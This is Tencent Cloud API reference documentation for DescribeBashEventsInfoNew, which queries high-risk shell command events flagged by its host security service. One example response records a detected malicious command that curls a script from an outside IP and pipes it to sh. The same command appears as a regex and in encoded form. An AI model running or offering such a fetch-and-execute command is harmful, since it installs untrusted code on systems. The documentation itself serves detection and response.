tencent cloud

Feedback

DescribeBashEventsInfoNew

Last updated: 2024-08-27 11:42:27

1. API Description

Domain name for API request: cwp.tencentcloudapi.com.

This API is used to query high-risk command event details (new).

A maximum of 20 requests can be initiated per second for this API.

We recommend you to use API Explorer
Try it
API Explorer provides a range of capabilities, including online call, signature authentication, SDK code generation, and API quick search. It enables you to view the request, response, and auto-generated examples.

2. Input Parameters

The following request parameter list only provides API request parameters and some common parameters. For the complete common parameter list, see Common Request Parameters.

Parameter Name Required Type Description
Action Yes String Common Params. The value used for this API: DescribeBashEventsInfoNew.
Version Yes String Common Params. The value used for this API: 2018-02-28.
Region No String Common Params. This parameter is not required.
Id Yes Integer Event ID

3. Output Parameters

Parameter Name Type Description
BashEventsInfo BashEventsInfoNew Event details
Note: This field may return null, indicating that no valid values can be obtained.
RequestId String The unique request ID, generated by the server, will be returned for every request (if the request fails to reach the server for other reasons, the request will not obtain a RequestId). RequestId is required for locating a problem.

4. Example

Example1 Example

Input Example

POST / HTTP/1.1
Host: cwp.tencentcloudapi.com
Content-Type: application/json
X-TC-Action: DescribeBashEventsInfoNew
<Common request parameters>

{
    "Id": 12
}

Output Example

{
    "Response": {
        "BashEventsInfo": {
            "Uuid": "xx",
            "RegexBashCmd": "xx",
            "Platform": 1,
            "Id": 1,
            "Status": 1,
            "MachineWanIp": "xx",
            "Tags": [
                "xx"
            ],
            "MachineName": "xx",
            "RuleLevel": 1,
            "SuggestScheme": "xx",
            "Exe": "xx",
            "HostIp": "xx",
            "ModifyTime": "xx",
            "BashCmd": "xx",
            "RuleCategory": 1,
            "RuleId": 1,
            "HarmDescribe": "xx",
            "References": [
                "xx"
            ],
            "Quuid": "xx",
            "RuleName": "xx",
            "MachineStatus": "xx",
            "CreateTime": "xx",
            "PsTree": "xx"
        },
        "RequestId": "f14ce73f-50d7-4c36-af1d-fc33dae510c4"
    }
}

Example2 Example 1

Input Example

POST / HTTP/1.1
Host: cwp.tencentcloudapi.com
Content-Type: application/json
X-TC-Action: DescribeBashEventsInfoNew
<Common request parameters>

{
    "Id": "3170751"
}

Output Example

{
    "Response": {
        "BashEventsInfo": {
            "Uuid": "7168bc08-c1b8-11ea-9053-48fd8e5f474c",
            "Id": 3170751,
            "Quuid": "d8feb20e-dcdd-461b-9b37-336c42d48657",
            "HostIp": "172.16.0.49",
            "Platform": 4,
            "BashCmd": "/bin/sh -c curl 43.129.65.101/1.sh|sh",
            "RuleId": 0,
            "RuleName": "1003. Malicious command - downloads & executes unknown programs",
            "RuleLevel": 1,
            "Status": 0,
            "CreateTime": "2022-09-19 19:45:05",
            "Exe": "/usr/bin/bash",
            "ModifyTime": "2022-09-19 19:45:05",
            "PsTree": "W3sicGlkIjoyOTQ0NiwiZXhlIjoiL3Vzci9iaW4vYmFzaCIsImFjY291bnQiOiJyb290OnJvb3QiLCJjbWRsaW5lIjoiL2Jpbi9zaCAtYyBjdXJsIDQzLjEyOS42NS4xMDEvMS5zaHxzaCJ9LHsicGlkIjoyOTQ0NCwiZXhlIjoiL3Vzci9zYmluL2Nyb25kIiwiYWNjb3VudCI6InJvb3Q6cm9vdCIsImNtZGxpbmUiOiIvdXNyL3NiaW4vQ1JPTkQgLW4ifSx7InBpZCI6MTM5OSwiZXhlIjoiL3Vzci9zYmluL2Nyb25kIiwiYWNjb3VudCI6InJvb3Q6cm9vdCIsImNtZGxpbmUiOiIvdXNyL3NiaW4vY3JvbmQgLW4ifV0=",
            "User": "0:0",
            "Pid": "29446",
            "RegexBashCmd": "/bin/sh -c curl 43\\.129\\.65\\.101/1\\.sh\\|sh",
            "RuleCategory": 0,
            "MachineName": "Too many feature test software_ivon",
            "SuggestScheme": "1. Check for malicious processes and invalid ports, and remove suspicious startup items and scheduled tasks;\n2. Isolate or delete related Trojan files;\n3. Conduct a risk detection on the system and reinforce the security. For details, see the following link:?\n[Linux]https://www.tencentcloud.com/document/product/296/9604?from_cn_redirect=1?\n[Windows]https://www.tencentcloud.com/document/product/296/9605?from_cn_redirect=1",
            "HarmDescribe": "After hacking the server, the hacker may perform operations such as downloading malicious files, connecting to a mining pool, adding public keys, and viewing sensitive files for further malicious actions.",
            "Tags": [],
            "References": [],
            "MachineWanIp": "42.194.146.17",
            "MachineStatus": "ONLINE",
            "MachineType": 2,
            "DetectBy": 1
        },
        "RequestId": "0a9b5442-cd56-4b47-86c7-0f9f22d9fc7e"
    }
}

5. Developer Resources

SDK

TencentCloud API 3.0 integrates SDKs that support various programming languages to make it easier for you to call APIs.

Command Line Interface

6. Error Code

The following only lists the error codes related to the API business logic. For other error codes, see Common Error Codes.

Error Code Description
InternalError Internal error
InternalError.MainDBFail Failed to manipulate the data.
InvalidParameter Incorrect parameter.
InvalidParameter.InvalidFormat Incorrect parameter format.
InvalidParameter.MissingParameter Missing parameter.
InvalidParameter.ParsingError Incorrect parameter parsing.
InvalidParameterValue Invalid parameter value.
MissingParameter Missing parameter error.
ResourceNotFound The resource does not exist.
ResourceNotFound.MachineNotFound The scanning machine does not exist.
ResourceUnavailable The resource is not available.